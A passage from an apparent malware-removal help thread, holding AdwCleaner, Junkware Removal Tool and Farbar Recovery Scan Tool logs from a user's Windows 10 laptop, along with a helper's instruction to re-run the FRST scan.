[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\YTDownloader
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\AppDataLow\Software\Yahoo\Companion
[#] Key deleted on reboot: HKCU\Software\DAILYPCCLEAN
[#] Key deleted on reboot: HKCU\Software\DriverRestore
[#] Key deleted on reboot: HKCU\Software\eSupport.com
[#] Key deleted on reboot: HKCU\Software\GlobalUpdate
[#] Key deleted on reboot: HKCU\Software\Microsoft\Tinstalls
[#] Key deleted on reboot: HKCU\Software\ParetoLogic
[#] Key deleted on reboot: HKCU\Software\powerpack
[#] Key deleted on reboot: HKCU\Software\PRODUCTSETUP
[#] Key deleted on reboot: HKCU\Software\ProfessionalCleaningSoftwareLanguage
[#] Key deleted on reboot: HKCU\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: HKCU\Software\speedypc software
[#] Key deleted on reboot: HKCU\Software\Store
[#] Key deleted on reboot: HKCU\Software\TNT2
[#] Key deleted on reboot: HKCU\Software\tstamptoken
[#] Key deleted on reboot: HKCU\Software\WTools
[#] Key deleted on reboot: HKCU\Software\Yahoo\Companion
[#] Key deleted on reboot: HKCU\Software\Yahoo\YFriendsBar
[#] Key deleted on reboot: HKCU\Software\NowUSeeItPlayer
[#] Key deleted on reboot: HKCU\Software\INSTALLPATH\STATUS
[#] Key deleted on reboot: HKCU\Software\YTDownloader
[#] Key deleted on reboot: HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key deleted: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key deleted: HKLM\SOFTWARE\{F2E9660B-98AF-42c0-8258-9CDDF07BF95D}
[-] Key deleted: HKLM\SOFTWARE\GlobalUpdate
[-] Key deleted: HKLM\SOFTWARE\MetaStream
[-] Key deleted: HKLM\SOFTWARE\NetTcpHandler
[-] Key deleted: HKLM\SOFTWARE\NtSvcHandler
[-] Key deleted: HKLM\SOFTWARE\ParetoLogic
[-] Key deleted: HKLM\SOFTWARE\Professional Cleaning Software
[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key deleted: HKLM\SOFTWARE\speedypc software
[-] Key deleted: HKLM\SOFTWARE\Viewpoint
[-] Key deleted: HKLM\SOFTWARE\Yahoo\Companion
[-] Key deleted: HKLM\SOFTWARE\YTDownloader
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ViewpointMediaPlayer
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{730E03E4-350E-48E5-9D3E-4329903D454D}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C0AFC06A-6C9E-420F-AABF-B1AC7EE1F589}
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate
[#] Key deleted on reboot: [x64] HKCU\Software\DAILYPCCLEAN
[#] Key deleted on reboot: [x64] HKCU\Software\DriverRestore
[#] Key deleted on reboot: [x64] HKCU\Software\eSupport.com
[#] Key deleted on reboot: [x64] HKCU\Software\GlobalUpdate
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Tinstalls
[#] Key deleted on reboot: [x64] HKCU\Software\ParetoLogic
[#] Key deleted on reboot: [x64] HKCU\Software\powerpack
[#] Key deleted on reboot: [x64] HKCU\Software\PRODUCTSETUP
[#] Key deleted on reboot: [x64] HKCU\Software\ProfessionalCleaningSoftwareLanguage
[#] Key deleted on reboot: [x64] HKCU\Software\SlimWare Utilities Inc
[-] Key deleted: [x64] HKCU\Software\speedypc software
[#] Key deleted on reboot: [x64] HKCU\Software\Store
[#] Key deleted on reboot: [x64] HKCU\Software\TNT2
[#] Key deleted on reboot: [x64] HKCU\Software\tstamptoken
[#] Key deleted on reboot: [x64] HKCU\Software\WTools
[#] Key deleted on reboot: [x64] HKCU\Software\Yahoo\Companion
[#] Key deleted on reboot: [x64] HKCU\Software\Yahoo\YFriendsBar
[#] Key deleted on reboot: [x64] HKCU\Software\NowUSeeItPlayer
[#] Key deleted on reboot: [x64] HKCU\Software\INSTALLPATH\STATUS
[#] Key deleted on reboot: [x64] HKCU\Software\YTDownloader
[#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key deleted: [x64] HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key deleted: [x64] HKLM\SOFTWARE\DriverRestore
[-] Key deleted: [x64] HKLM\SOFTWARE\WebBar
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Driver Restore
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70AA5E57-6A21-42B8-9B5F-8F071CC265AD}
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\75E5AA0712A68B24B9F5F870C12C56DA
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\75E5AA0712A68B24B9F5F870C12C56DA
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\SearchScopes\{1B687A8D-64D5-4CAD-B865-D4512F4B23DD}
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{1B687A8D-64D5-4CAD-B865-D4512F4B23DD}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77F8667C-BC7F-4CCB-B5BD-96659BD2F0DE}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{1B687A8D-64D5-4CAD-B865-D4512F4B23DD}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{21464931-263a-4a60-930e-a79b690b399f} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{21464931-263a-4a60-930e-a79b690b399f} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0} [NameServer]
[-] Value deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Windows\CurrentVersion\Run [NowUSeeIt Player]
[-] Value deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [NowUSeeIt Player]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [NowUSeeIt Player]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [NowUSeeIt Player]
[-] Value deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [NowUSeeIt Player]
[-] Value deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Windows\CurrentVersion\Run [SlimCleaner Plus]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [SlimCleaner Plus]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [SlimCleaner Plus]
[-] Key deleted: HKCU\Software\Classes\AppID\ShopAtHomeHelper.EXE
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [Selection Tools.exe]
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [wb.exe]
[-] Key deleted: HKLM\SOFTWARE\MozillaPlugins\@viewpoint.com/VMP
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\DriverRestore.exe
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [WeatherBug.exe]
[#] Value deleted on reboot: HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [wb.exe]
[#] Value deleted on reboot: HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [Selection Tools.exe]
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[-] Key deleted: HKCU\Software\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg
[-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg
[#] Key deleted on reboot: [x64] HKCU\Software\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg
[-] Key deleted: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg


***** [ Web browsers ] *****

[-] Chrome preferences cleaned: "browser.startup.homepage" - "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
[-] Chrome preferences cleaned: "browser.startup.homepage" - "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
[-] Chrome preferences cleaned: "browser.search.selectedEngine" - "Search Provided by Yahoo"
[-] Chrome preferences cleaned: "keyword.URL" - "hxxp://aolsearch.aol.com/aol/search?invocationType=client_searchbox&query="
[-] Chrome preferences cleaned: "browser.search.defaultenginename" - "Search Provided by Yahoo"
[-] [C:\Users\Randy\AppData\Local\Chromium\User Data\Default] [extension] Deleted: kofkpgiaknijknhajbhnghkodiccblkg
[-] [C:\Users\Randy\AppData\Local\Chromium\User Data\Default] [homepage] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3Dchmm%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&uref=chmm
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search provided by yahoo.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search.yahoo.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [startup_urls] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuFhCJrEQv%2Fc%2BX2qZcHHjPPs%2Bq5PxEnDevcjOXYLyIHaBnM0IoJ8MqMcKnm8tCbPzRbgJMRuO8J430v3e4Ts%2F%2BpSpNuZ2wz8ISRKpXfOt2Mn1ECKZer7C78v27A4TWru%2BOJphUGzd3uNG%2Bbj9taw10baItFUSSmTPZfB91iIJ4NZHs%3D
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [startup_urls] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: kofkpgiaknijknhajbhnghkodiccblkg
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [homepage] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF4vDPXvI545K5Lk0yZuaPTEZETNhOb%2FBJMlU3cWrtE3B5LPuATRj4TiQDTLE5W%2F6T1gG3gr%2B63Fuf4DJw3bmxC%2BZWeGECWX8xosk8oaYOJhVzfdn7C0MU8tFOhlX0D867I7w%2FY3BPKDl2YWznSMNnMNhdfhuhn%2BhoVJITdlVyN5g%3D


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [33818 Bytes] - [11/02/2017 18:11:15]
C:\AdwCleaner\AdwCleaner[R0].txt - [2767 Bytes] - [12/09/2014 16:43:22]
C:\AdwCleaner\AdwCleaner[S0].txt - [2597 Bytes] - [12/09/2014 16:45:13]
C:\AdwCleaner\AdwCleaner[S1].txt - [29934 Bytes] - [11/02/2017 17:49:07]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [34112 Bytes] ##########
 
JRT:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 10 Home x64
Ran by Randy (Administrator) on Sat 02/11/2017 at 18:20:10.04
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 34

Failed to delete: C:\Program Files (x86)\speedypc software (Folder)
Successfully deleted: C:\ProgramData\28341ff220e0446c9fff27c4493d622e (Folder)
Successfully deleted: C:\ProgramData\pc drivers headquarters (Folder)
Successfully deleted: C:\ProgramData\speedypc software (Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{0DA28192-C8DF-4A02-90B1-EAF920C85944} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{1F55E6FA-1426-4897-B666-A3E6A30B840E} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{297860A2-6C9A-4CB6-8FB1-2A9CD97407F6} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{3BC0DD74-3709-4627-ADC3-455494AFD0D8} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{423A682D-48A0-4F57-B2E1-620C03ABD442} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{49E8E75A-954B-4D52-9B14-DBD1DF88C87D} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{4DF64422-DCE4-45C4-831A-8D14E1555A8D} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{4F4EBB35-A8AA-41A6-A95E-8977156A1F43} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{6382432F-F59C-4DAE-AF83-BBFE84C2F3B0} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{7864F51F-109C-4D91-99CA-960B5DCEFB5D} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{7D9F120B-5910-436B-9C04-DD2B6A52C364} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{8C314D96-8AD3-4F69-B94B-9AC40CBB89F5} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{B5EB4976-E1A7-4AC3-AA4D-FEE8B10E0FE9} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{BD0C7B1E-BA5F-44BB-BA70-4F2EFB7F4489} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{CD61501A-DCE9-4A43-994F-C918C85D4E8A} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{D1854D6F-BD77-4CA6-9759-668855379765} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{DD18E879-34ED-41C5-AD8A-F93E41CDF570} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{E4E4034A-F34A-49F0-99F7-6BA42CE440F5} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{E812227F-F832-43FD-8726-024ECC8496A6} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{F693923A-D158-4524-AF89-B727FCC67C46} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{FC16AD97-C30B-4AB5-BFD1-6F7D30630C45} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\installer (Folder)
Successfully deleted: C:\Users\Randy\Appdata\LocalLow\company (Folder)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\{7affbfae-c4e2-4915-8c0f-00fa3ec610a1} (Folder)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\staged (Folder)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\aolsearch.xml (File)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\user.js (File)
Successfully deleted: C:\WINDOWS\system32\Tasks\SpeedFixToolPro_Start (Task)
Successfully deleted: C:\Program Files\comodo\geekbuddy (Folder)
Successfully deleted: C:\Users\Randy\desktop\Continue Flash Player Updater Installation.lnk (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 02/11/2017 at 18:24:41.69
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Re-run the Farbar Recovery Scan Tool (FRST/FRST64) that you ran at the very beginning of this topic.

  • Double-click to run it.
  • Make sure you checkmark the Addition.txt box.
  • Press the Scan button.
  • The scan will create two logs, FRST.txt and Addition.txt, in the same directory the tool is run from. Please copy and paste them into your reply.
 
Frst:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
Ran by Randy (administrator) on HP-RRR (11-02-2017 20:20:08)
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(SpeedyPC Software) C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-01-04] (IDT, Inc.)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-01-19] (Atheros Commnucations)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-27] (Synaptics Incorporated)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [576568 2011-11-29] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\AOLSoftware.exe [41800 2010-03-07] (AOL Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1160408 2016-12-17] (Adobe Systems Incorporated)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [HP OfficeJet 3830 series (NET)] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\ScanToPCActivationApp.exe [3651080 2015-03-09] (Hewlett-Packard Development Company, LP)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [Chromium] => c:\users\randy\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
ShellIconOverlayIdentifiers: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
